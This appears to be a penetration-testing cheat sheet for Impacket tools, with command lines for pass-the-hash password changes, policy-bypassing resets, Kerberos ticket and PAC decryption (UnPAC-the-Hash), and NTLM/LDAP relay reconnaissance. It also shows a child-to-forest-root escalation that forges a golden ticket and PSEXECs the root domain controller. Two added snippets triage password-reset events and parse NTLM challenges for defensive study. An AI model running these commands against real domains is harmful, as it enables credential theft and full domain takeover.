Impacket: Miscellaneous Tools

Quick Reference

Tool                Purpose
changepasswd.py     Change or reset passwords over SMB, RPC, Kpasswd, or LDAP
describeTicket.py   Parse and decrypt a Kerberos ticket, display PAC contents
DumpNTLMInfo.py     Grab server info from NTLM negotiation (OS, domain, hostname)
CheckLDAPStatus.py  Check LDAP signing and channel binding enforcement on a DC
raiseChild.py       Privilege escalation from child domain to forest root

changepasswd.py

Change or reset user passwords over multiple protocols: SMB-SAMR, RPC-SAMR, Kpasswd (Kerberos), or LDAP.

Syntax:

changepasswd.py [options] <domain>/<username>[:<password>]@<target>

Common Usage:

# Change own password (user knows current password)
changepasswd.py <domain>/<username>:<password>@<target> -newpass <password>

# Force reset another user's password (privileged)
changepasswd.py <domain>/<target-username>@<target> \
  -altuser <domain>/<admin-username> -altpass <password> \
  -newpass <password> -reset

# Change password via NT hash (Pass-the-Hash)
changepasswd.py <domain>/<username>@<target> \
  -hashes <lm-hash>:<nt-hash> -newpass <password>

# Set new password using NT hash (no cleartext)
changepasswd.py <domain>/<username>:<password>@<target> \
  -newhashes :<nt-hash>

# Change via Kpasswd (Kerberos protocol)
changepasswd.py <domain>/<username>:<password>@<dc-ip> \
  -protocol kpasswd -newpass <password>

# Change via LDAP
changepasswd.py <domain>/<username>:<password>@<dc-ip> \
  -protocol ldap -newpass <password>

# Reset via RPC (may bypass some password policies)
changepasswd.py <domain>/<target-username>@<target> \
  -altuser <admin-username> -altpass <password> \
  -protocol rpc-samr -newpass <password> -reset

# Kerberos auth (ccache)
KRB5CCNAME=<ticket> changepasswd.py -k -no-pass <domain>/<username>@<target> \
  -newpass <password>

Options:
- -newpass <password>: New cleartext password
- -newhashes <lm-hash>:<nt-hash>: New password as NTLM hash (NTHASH or LM:NT)
- -hashes <lm-hash>:<nt-hash>: Auth hashes for target user
- -no-pass: Don't prompt for password
- -altuser <username>: Privileged account performing the change
- -altpass <password>: Password for altuser
- -althash <nt-hash>: NT hash for altuser
- -protocol {smb-samr,rpc-samr,kpasswd,ldap} / -p: Protocol (default: smb-samr)
- -reset / -admin: Force reset (may bypass password policy)
- -k: Kerberos auth
- -aesKey <aes256-key>: AES Kerberos key
- -dc-ip <dc-ip>: DC IP (for Kerberos / kpasswd)

Notes:
- kpasswd works on port 464 directly against the KDC
- -reset is useful when forcing a password reset on a locked account
- smb-samr is the most reliable default protocol
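A change (user supplies the current password) and a forced reset (-reset, no current password) leave different Windows Security events, 4723 and 4724 respectively. As an added example, not from this page or from Impacket, the following triages constructed 4723/4724 records and ranks resets of other accounts by unapproved principals highest; the event ids are real, while the flattened log format and the approved-resetter set are assumptions.

```python
import re

# Constructed sample Security-log events (not real logs), flattened to key=value.
# 4723 = attempt to change a password (caller knows the old one: a plain changepasswd run)
# 4724 = attempt to reset a password (no old password needed: the -reset path, which may
#        skip the policy checks a user-initiated change is subject to)
SAMPLE_EVENTS = [
    "EventID=4723 SubjectUserName=jdoe TargetUserName=jdoe Computer=DC01",
    "EventID=4724 SubjectUserName=helpdesk1 TargetUserName=jdoe Computer=DC01",
    "EventID=4724 SubjectUserName=jdoe TargetUserName=svc_backup Computer=DC01",
    "EventID=4724 SubjectUserName=WS01$ TargetUserName=WS01$ Computer=DC01",
]
# Assumption: accounts that are allowed to reset other users' passwords
APPROVED_RESETTERS = {"helpdesk1"}

def parse_event(line: str) -> dict:
    """Split a flattened key=value event line into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def triage(lines, approved=APPROVED_RESETTERS):
    """Return one (severity, message) per event; unapproved forced resets rank highest."""
    findings = []
    for ev in map(parse_event, lines):
        subj, target, eid = ev["SubjectUserName"], ev["TargetUserName"], ev["EventID"]
        if eid == "4723":
            # A change normally comes from the account itself
            sev = "info" if subj == target else "medium"
            msg = f"password change on {target} by {subj}"
        elif eid == "4724":
            if subj == target:  # e.g. machine accounts rotating their own password
                sev, msg = "low", f"self reset of {target}"
            elif subj in approved:
                sev, msg = "medium", f"approved reset of {target} by {subj}"
            else:
                sev, msg = "high", f"forced reset of {target} by unapproved account {subj}"
        else:
            continue
        findings.append((sev, msg))
    return findings
```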


describeTicket.py

Parse a Kerberos ccache ticket, decrypt the encrypted portion, and display the PAC (including group memberships, SIDs, and credentials).

Syntax:

describeTicket.py [options] <ticket.ccache>

Common Usage:

# Parse ticket (no decryption; shows outer structure only)
describeTicket.py <ticket>

# Decrypt ticket with service account password
describeTicket.py <ticket> -p <password> -u <username> -d <domain>

# Decrypt with NT hash (RC4)
describeTicket.py <ticket> --rc4 <nt-hash>

# Decrypt with AES key
describeTicket.py <ticket> --aes <aes256-key>

# UnPAC-the-Hash: decrypt PAC Credentials section (PKINIT AS reply key)
describeTicket.py <ticket> --asrep-key <asrep-key-hex>

Options:
- <ticket>: Path to the ccache file (positional, required)
- -p <password> / --password <password>: Service account cleartext password for decryption
- -hp <hex> / --hex-password <hex>: Hex-encoded password
- -u <user> / --user <user>: Service account username
- -d <domain> / --domain <domain>: Domain FQDN
- -s <salt> / --salt <salt>: Key derivation salt
- --rc4 <nt-hash>: NT hash (RC4 key) for decryption
- --aes <hex>: AES-128 or AES-256 key for decryption
- --asrep-key <hex>: AS reply key for decrypting PAC Credentials (UnPAC-the-Hash)

Notes:
- Without decryption keys, only the unencrypted ticket metadata is shown (realm, sname, validity)
- With decryption, reveals: groups, extra SIDs, UPN, user flags, PAC logon info
- --asrep-key enables UnPAC-the-Hash: extracts LM/NT hashes from a PKINIT-obtained ticket's PAC Credentials structure
- Service key = key of the account that owns the SPN in the ticket


DumpNTLMInfo.py

Perform NTLM negotiation against a target and extract host metadata without authenticating.

Syntax:

DumpNTLMInfo.py [options] <target>

Common Usage:

# Probe SMB port (default)
DumpNTLMInfo.py <target>

# Probe RPC endpoint mapper (port 135)
DumpNTLMInfo.py <target> -port 135 -protocol RPC

# Specific port
DumpNTLMInfo.py <target> -port 445

# Connect to an explicit IP instead of resolving <target>
DumpNTLMInfo.py <target> -target-ip <target-ip>

Options:
- -target-ip <target-ip>: Target IP override (skips name resolution of <target>)
- -port <port>: Destination port
- -protocol [protocol]: SMB (default) or RPC

Output includes:
- NetBIOS hostname and domain
- DNS hostname and domain
- OS version (Windows build)
- Server timestamp
- Whether SMB signing is required

Notes:
- No credentials required; completely unauthenticated
- Useful for quick OS version fingerprinting before exploitation
- Combine with CheckLDAPStatus.py to assess relay viability
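To see what an unauthenticated peer learns from a server's NTLM CHALLENGE_MESSAGE, the following added example (not part of this page or of Impacket) parses the Version field and the TargetInfo AV_PAIR list the way DumpNTLMInfo.py reports them; offsets, AV ids and flag values follow MS-NLMP, and the sample message is constructed inline. Note that whether SMB signing is required is not in the NTLM message itself but in the SMB2 NEGOTIATE response, so it is out of scope here.

```python
import struct
from datetime import datetime, timedelta, timezone
# AV_PAIR ids from MS-NLMP 2.2.2.1: id 7 is a FILETIME, the others are UTF-16LE strings
AV_NAMES = {1: "netbios_computer", 2: "netbios_domain", 3: "dns_computer",
            4: "dns_domain", 5: "dns_tree", 7: "timestamp"}
NEGOTIATE_VERSION = 0x02000000  # the Version field is only meaningful when this flag is set
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def parse_challenge(msg: bytes) -> dict:
    """Extract the host metadata carried in an NTLM CHALLENGE_MESSAGE (Type 2)."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 2:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    flags = struct.unpack_from("<I", msg, 20)[0]
    info = {"flags": flags}
    if flags & NEGOTIATE_VERSION:  # the Windows build number is disclosed here
        major, minor, build = struct.unpack_from("<BBH", msg, 48)
        info["os_version"] = f"{major}.{minor} build {build}"
    ti_len, _, ti_off = struct.unpack_from("<HHI", msg, 40)  # TargetInfoFields
    pos, end = ti_off, ti_off + ti_len
    while pos + 4 <= end:
        av_id, av_len = struct.unpack_from("<HH", msg, pos)
        value = msg[pos + 4:pos + 4 + av_len]
        pos += 4 + av_len
        if av_id == 0:  # MsvAvEOL terminates the list
            break
        if av_id == 7:  # MsvAvTimestamp: 100 ns ticks since 1601-01-01 UTC
            ticks = struct.unpack("<Q", value)[0]
            info["timestamp"] = (FILETIME_EPOCH + timedelta(microseconds=ticks // 10)).isoformat()
        elif av_id in AV_NAMES:
            info[AV_NAMES[av_id]] = value.decode("utf-16-le")
    return info

def build_challenge(pairs: dict, version=(10, 0, 19041)) -> bytes:
    """Build a minimal CHALLENGE_MESSAGE for testing (constructed input, not a capture)."""
    target_info = b"".join(struct.pack("<HH", i, len(v)) + v for i, v in pairs.items())
    target_info += struct.pack("<HH", 0, 0)  # MsvAvEOL
    hdr_len = 56  # fixed-size header including the Version field
    return (b"NTLMSSP\x00" + struct.pack("<I", 2)
            + struct.pack("<HHI", 0, 0, hdr_len)  # TargetNameFields: empty
            + struct.pack("<I", NEGOTIATE_VERSION | 0x00800000)  # | NTLMSSP_NEGOTIATE_TARGET_INFO
            + b"\x11" * 8 + b"\x00" * 8  # ServerChallenge (constructed), Reserved
            + struct.pack("<HHI", len(target_info), len(target_info), hdr_len)
            + struct.pack("<BBHBBBB", *version, 0, 0, 0, 15)  # Version, NTLMRevision 15
            + target_info)

# Constructed sample: DC01 in corp.example, server time 2024-01-01T00:00:00Z
SAMPLE = build_challenge({1: "DC01".encode("utf-16-le"), 2: "CORP".encode("utf-16-le"),
                          3: "dc01.corp.example".encode("utf-16-le"),
                          4: "corp.example".encode("utf-16-le"), 7: struct.pack("<Q", 133485408000000000)})
```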


CheckLDAPStatus.py

Check LDAP signing and channel binding enforcement on a domain controller; this determines relay attack viability.

Syntax:

CheckLDAPStatus.py -dc-ip <dc-ip> -domain <domain>

Common Usage:

# Check LDAP signing and channel binding
CheckLDAPStatus.py -dc-ip <dc-ip> -domain <domain>

# With debug output
CheckLDAPStatus.py -dc-ip <dc-ip> -domain <domain> -debug

# Custom DNS timeout
CheckLDAPStatus.py -dc-ip <dc-ip> -domain <domain> -timeout 10

Options:
- -dc-ip <dc-ip>: DC IP or DNS resolver (required)
- -domain <domain>: Domain name (required)
- -debug: Debug output
- -timeout <seconds>: DNS timeout

Output interpretation:
- LDAP signing: NOT required → LDAP relay attacks are viable
- LDAP signing: required → LDAP relay blocked (use LDAPS)
- Channel binding: NOT required → ntlmrelayx LDAP relay works
- Channel binding: required → LDAPS relay blocked

Notes:
- Pair with DumpNTLMInfo.py for full pre-relay assessment
- SMB signing check: use nmap --script smb2-security-mode or netexec smb


raiseChild.py

Privilege escalation from a child domain to the forest root using the trust key (the equivalent of Mimikatz's lsadump::trust /patch).

Syntax:

raiseChild.py [options] <domain>/<username>[:<password>]

Common Usage:

# Full attack: escalate from child domain to forest root and PSEXEC target
raiseChild.py <child-domain>/<username>:<password> \
  -target-exec <dc-hostname>

# Save golden ticket without PSEXEC
raiseChild.py <child-domain>/<username>:<password> \
  -w <output>

# Pass-the-Hash
raiseChild.py -hashes <lm-hash>:<nt-hash> \
  <child-domain>/<username> -target-exec <dc-hostname>

# Target specific RID (default: 500 = Administrator)
raiseChild.py <child-domain>/<username>:<password> \
  -target-exec <dc-hostname> -targetRID 500

Options:
- -target-exec <address>: Host to PSEXEC after escalation
- -targetRID <rid>: Target user RID to dump credentials for (default: 500)
- -w <pathname>: Save golden ticket to ccache file
- -hashes <lm-hash>:<nt-hash>: NTLM hash auth
- -k / -no-pass: Kerberos via ccache
- -aesKey <aes256-key>: AES Kerberos key

Notes:
- Requires Domain Admin privileges in the child domain
- Exploits the SID History + inter-realm trust key to forge a golden ticket trusted by the forest root DC
- The forged ticket includes the Enterprise Admins SID (S-1-5-21-...-519)
- After escalation, perform DCSync against the forest root DC